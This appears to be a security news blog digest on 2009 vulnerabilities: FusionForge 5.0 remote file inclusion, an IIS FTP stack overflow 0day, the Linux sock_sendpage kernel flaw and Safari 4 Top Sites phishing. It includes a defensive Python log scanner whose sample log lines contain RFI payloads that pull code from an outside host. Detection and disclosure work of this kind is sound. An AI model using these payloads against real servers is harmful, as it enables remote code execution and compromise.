Multiple RFI vulnerabilities in FusionForge 5.0

cr4wl3r has reported multiple Remote File Inclusion (RFI) vulnerabilities in FusionForge 5.0, which could allow a malicious user to compromise a vulnerable system.

The list of vulnerable pages is very long and the number of affected parameters is also considerable. These flaws could allow remote code to be included and executed in the context of the web server hosting the FusionForge 5.0 application.

The vulnerabilities were reported for version 5.0, but other versions may also be affected.

A great many websites use this application, both internationally and in France alone. Various government bodies use it, and it is a virtual certainty that they will soon be targeted by RFI scanners and exploitation attempts. A simple Google query for the term “Powered by FusionForge” shows the enormous number of websites running it.

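Added example (not code from the advisory or from the FusionForge project): detection logic, in Python, that flags any request trying to set one of the FusionForge 5.0 include-prefix parameters (gfcommon, gfwww, gfplugins, gfconfig and their register_globals-style GLOBALS[...] forms) from the query string, and separates a stray request from the sweep pattern an RFI scanner leaves. It assumes Apache combined log format; the log lines are constructed samples.

```python
"""Detect RFI probes against the FusionForge 5.0 include-prefix parameters
in web server access logs. Added example, not part of the original advisory;
the log lines below are constructed samples."""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Include-path prefix variables that FusionForge 5.0 let a request override.
# None of these is ever a legitimate query-string parameter, so any
# occurrence is worth an alert; a remote stream wrapper makes it RFI.
PREFIX_PARAMS = {"gfcommon", "gfwww", "gfplugins", "gfconfig", "sys_plugins_path"}

# Apache "combined" log format (assumption: the forge sits behind Apache).
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# A value starting with a stream wrapper is remote-inclusion material.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp|ftps|php|data)://', re.IGNORECASE)


def canonical_param(name):
    """'GLOBALS[gfcommon]' and 'gfcommon' both name the same include prefix."""
    m = re.fullmatch(r'GLOBALS\[(\w+)\]', name)
    return m.group(1) if m else name


def classify_request(target):
    """Return (kind, param, value) for the first include-prefix override in
    the request target, or None. kind is 'rfi' for remote stream wrappers
    and 'local-override' for any other value (still worth alerting on)."""
    query = urlsplit(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        param = canonical_param(name)
        if param in PREFIX_PARAMS:
            kind = "rfi" if REMOTE_RE.match(value) else "local-override"
            return kind, param, value
    return None


def scan_log(text):
    """Parse access-log text; return one finding dict per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        hit = classify_request(m.group("target"))
        if hit is None:
            continue
        kind, param, value = hit
        findings.append({
            "client": m.group("client"),
            "script": urlsplit(m.group("target")).path,
            "param": param,
            "value": value,
            "kind": kind,
            "status": int(m.group("status")),
        })
    return findings


def scanners(findings, min_scripts=2):
    """Clients that probed at least min_scripts distinct scripts: the sweep
    an RFI scanner leaves, as opposed to a single stray request."""
    by_client = defaultdict(set)
    for f in findings:
        by_client[f["client"]].add(f["script"])
    return {c: sorted(s) for c, s in by_client.items() if len(s) >= min_scripts}


# Constructed sample log lines (RFC 5737 documentation addresses).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Sep/2009:14:02:11 +0200] "GET /forge/common/include/pre.php?gfcommon=http://203.0.113.9/x.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.7 - - [10/Sep/2009:14:02:12 +0200] "GET /forge/plugins/extratabs/extratabs-init.php?GLOBALS[sys_plugins_path]=http%3A%2F%2F203.0.113.9%2Fx.txt%3F HTTP/1.1" 200 480 "-" "Mozilla/4.0"
198.51.100.4 - - [10/Sep/2009:14:03:01 +0200] "GET /forge/tracker/?group_id=42&atid=7 HTTP/1.1" 200 9812 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Sep/2009:14:03:05 +0200] "GET /forge/www/include/user_home.php?gfwww=/tmp/ HTTP/1.1" 500 210 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['client']} {f['kind']:14} {f['script']} {f['param']}={f['value']!r}")
    print("scanners:", scanners(scan_log(SAMPLE_LOG)))
```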

IIS5 & 6 FTP Stack Overflow 0day

Earlier today, Kingcope published on the Full Disclosure mailing list a 0day targeting IIS 5 and 6 through the FTP service built into IIS on Windows 2000. This 0day has several behaviours:

– on IIS 5 under Windows 2000, the exploit provides a shell on the server, allowing it to be compromised, but it requires some form of authentication (for example anonymous, a nod to Damien …) and that the FTP user be able to create a directory. Hard to exploit as anonymous.

– on IIS 6 under Windows 2003, the exploit allows a denial of service (DoS) against the web server, making it unreachable (there is going to be DoS in the air).

#Microsoft Internet Information Server 5.0/6.0
#FTP Server Remote Stack Based Overrun
# IIS 5.0 FTPd / Remote r00t exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2googlemail.com
# Affects IIS6 with stack cookie protection
# August 2009 - KEEP THIS 0DAY PRIV8

To protect against these exploitation attempts, obviously only grant FTP access to trusted users.

It is also possible to detect this attack with the Snort IDS using the VRT rule: (ftp_telnet) FTP command parameters were too long


CVE-2009-2692: Linux Kernel 2.x sock_sendpage() Local Ring0 Root Exploit

Tavis Ormandy (former security lead at Gentoo) and Julien Tinnes of the Google Security Team have discovered a serious local vulnerability in the Linux kernel; all kernel versions from 2.4.4 to 2.4.37.4 and from 2.6.0 to 2.6.30.4 are vulnerable.

A malicious local user could use this vulnerability to take full control of the system. Given the number of RFI vulnerabilities floating around the Internet, one can imagine that this vulnerability is going to hurt a great deal in the coming days and weeks.

What is even more worrying is that this vulnerability has been present in the Linux kernel for nearly 8 years! Has it never been exploited before? That is doubtful: if members of the Google Security Team found it, others have surely found it too.

The Linux kernel developers have released an update that fixes this vulnerability.

An exploit has been available on Milw0rm since 14 August; the video below and the test I carried out show that it works perfectly (sic)!

Hijacking Safari 4 Top Sites with Phish Bombs

Inferno of SecureThoughts.com has reported a vulnerability in Apple's Safari 4 browser. This rather unusual vulnerability exploits the “Top Sites” and “Cover Flow” features introduced in Safari 4.

The “Top Sites” feature provides a graphical view of the user's favourite websites, giving quick access to the sites visited most often, such as eBay, Amazon, Facebook, Gmail, etc.

The vulnerability consists of placing malicious sites, for example phishing sites, into “Top Sites”, and it can be exploited simply by browsing the Internet and clicking a malicious link. Basic JavaScript code is then run in a small window to simulate repeated visits to the malicious sites so that they appear popular. The window is made completely invisible with the JavaScript “window.blur” function, so the user has no idea an attack is under way.

The exploit is really basic, and it is truly regrettable that Apple does not take the trouble to study and test in advance the potential vulnerabilities of its new features or products. Apple, please don't turn into Adobe.